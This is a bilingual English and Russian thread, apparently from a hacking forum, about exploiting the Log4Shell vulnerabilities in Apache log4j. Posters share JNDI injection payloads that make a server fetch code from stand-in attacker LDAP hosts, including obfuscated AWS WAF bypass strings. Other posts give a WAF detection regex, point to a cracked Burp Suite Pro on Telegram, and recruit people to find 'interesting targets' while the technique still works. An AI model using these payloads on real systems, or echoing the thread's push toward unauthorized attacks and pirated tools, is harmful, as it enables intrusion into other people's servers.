Remote CVE-2021-44228 Apache log4j RCE

[funnyleak]

Contrary to what we thought in the early hours, the installed version of JAVA does not affect the success of the RCE. It is therefore possible to obtain an RCE with any version of JAVA using serialized payloads.
Go hack the planet (responsibly of course)

Clone this repository before it is removed
JNDI Exploit Kit

 

[UnknownDeath]

I think this article should explain it for u https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j

Thanks I'm working in getting into exploitation so I'm just trying to inquire info about how things work

 

[Hongkong50]

Thanks I'm working in getting into exploitation so I'm just trying to inquire info about how things work

https://twitter.com/x/status/1470760929423937539

 

[Desoxyn]

Оф. плагин для бёрпа:

апдэйтится почти каждый день. Крайняя обнова вчера.
По сравнению с активсканом (да и другими тулзами на данный момент):

без него сканить бесполезно, т.к. очень много точек вставки и разные методы для ручного теста, он же проходит автоматом.
WAF'ы обходятся, методов много, регексы напр. , вот PCRE оттуда же, откудаweaver пэйлоады приложил :

/[uperlow\x24-\x26\x28\29\x5b\x5d\x7b\x7d\x3a-]+[Jj][uperlow\x24-\x26\x28\29\x5b\x5d\x7b\x7d\x3a-]*[Nn][uperlow\x24-\x26\x28\29\x5b\x5d\x7b\x7d\x3a-]*[Dd][uperlow\x24-\x26\x28\29\x5b\x5d\x7b\x7d\x3a-]*[Ii]/

Учтите, что словив респонз по днс - вообще не факт, что бага не FP. Пробуйте вывести системные переменные, версию явы, хостнэйм, етк.

 

[bbi34yy]

vimeo.com/656095367/3642ba0859
Тут видео его работы.

 

[SkyFall]

Еще cve подвезли)

Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaTrace

A quick update on the situation now that a new log4j CVE has been created and patched in 2.16.0. We've done research and these are our findings.

www.lunasec.io

 

[gu1cr]

Collection of WAF evasion payloads

This is java?

 

[zerosum0x0]

This is java?

Yea log4j system of loger and can execute java compiled class

 

[zerosum0x0]

This is java?

now this fixed

 

[gu1cr]

I don't have the Burpsuit Pro for test this... anybody knows about one alternative?

 

[Lipshitz]

I don't have the Burpsuit Pro for test this... anybody knows about one alternative?

Here bro this group has lots of good paid software as well as up-to-date books, white papers etc. Mostly English some Russian.

This is the link for latest burp pro crack

Telegram: Contact @zer0daylab

t.me

This is general invitation to the group in case you can't use the first one. I forget how it works but just search burp n it's there

Telegram: Contact @zer0daylab

t.me

 

[Lipshitz]

Еще cve подвезли)

Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) | LunaTrace

A quick update on the situation now that a new log4j CVE has been created and patched in 2.16.0. We've done research and these are our findings.

www.lunasec.io

Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges

Hackers have begun exploiting the 2nd Log4J vulnerability, and the 3rd has already been reported and will be revealed very soon.

thehackernews.com

...and a 3rd.

 

[Desoxyn]

CVE-2021-44228 прикрыли в Log4j 2.15.0
Praetorian сообщили о байпассе и довели до дос, что в итоге раскрутили опять до rce )
CVE-2021-45046 присвоили CVSS score 9.0
туть детали-с
"${jndi:ldap://127.0.0.1#evilhost.com:1389/a}"

 

[invisibiliahospite]

CVE-2021-44228 прикрыли в Log4j 2.15.0

С 2.16, совсем убрали log4j. На 2.15 все еще можно попробовать.

"Вчера p0rz9 писал, что эксплуатация CVE-2021-44228 возможна лишь в том случае, если для параметра log4j2.formatMsgNoLookups установлено значение false. Издание The Record сообщает, что, по информации компании KnownSec 404 Team, в релизе Log4j 2.15.0 для этого параметра установлено значение true, специально для предотвращения атак. Это означает, что пользователи Log4j, которые обновились до версии 2.15.0, а затем установили флаг на значение false, вновь будут уязвимы для атак. Причем пользователи Log4j, которые не обновились, но установили флаг на значение true, все равно смогут блокировать атаки даже на более старых версиях."

Тут хакер статью выпустили https://xakep.ru/2021/12/17/log4shell-story/
Странно, что на форуме еще не написали подробную статью за эксплуатацию, как было с proxylogon.

Может есть желающие покопаться? Напишите в пм, найду интересные таргеты и тоже присоединиюсь к реализации.
Готов работать. Есть бурп, есть сканеры, есть руки. И очень много времени.

 

[Kelegen]

New AWS WAF bypass

${jnd${123%25ff:-${123%25ff:-i:}}ldap://mydogsbutt.com:1389/o}

 

[Desoxyn]

...
Странно, что на форуме еще не написали подробную статью за эксплуатацию, как было с proxylogon.

Может есть желающие покопаться? Напишите в пм, найду интересные таргеты и тоже присоединиюсь к реализации.
Готов работать. Есть бурп, есть сканеры, есть руки. И очень много времени.

Еще отрабатывается, потому нет смысла стрелять себе в ногу пилить статью. Да и вряд ли тут целесообразно подтягивать кого то со стороны.

 

[invisibiliahospite]

Еще отрабатывается, потому нет смысла стрелять себе в ногу пилить статью. Да и вряд ли тут целесообразно подтягивать кого то со стороны.

А смысл потом в статье, когда техника уже не актуальна?

 

[Desoxyn]

А смысл потом в статье, когда техника уже не актуальна?

Вот и я про это Никто ж не говорит за "потом", вопрос был в "сейчас"

 

[Kelegen]

А смысл потом в статье, когда техника уже не актуальна?

Как по мне, смысл статей "потом" - в том, что некоторым людям которые работали и не доработали в тот момент когда это было актуально, знать конечный результат. Что бы в следующий раз следать это первым. Отточить свои навыки скажем так.

 

[marmalade]

Как по мне, смысл статей "потом" - в том, что некоторым людям которые работали и не доработали в тот момент когда это было актуально, знать конечный результат. Что бы в следующий раз следать это первым. Отточить свои навыки скажем так.

ну это как цтф, всегда интересно почитать райтапы того как проходили таски, особенно те которые не удалось пройти
invisibiliahospite так что я с удовольствием почитаю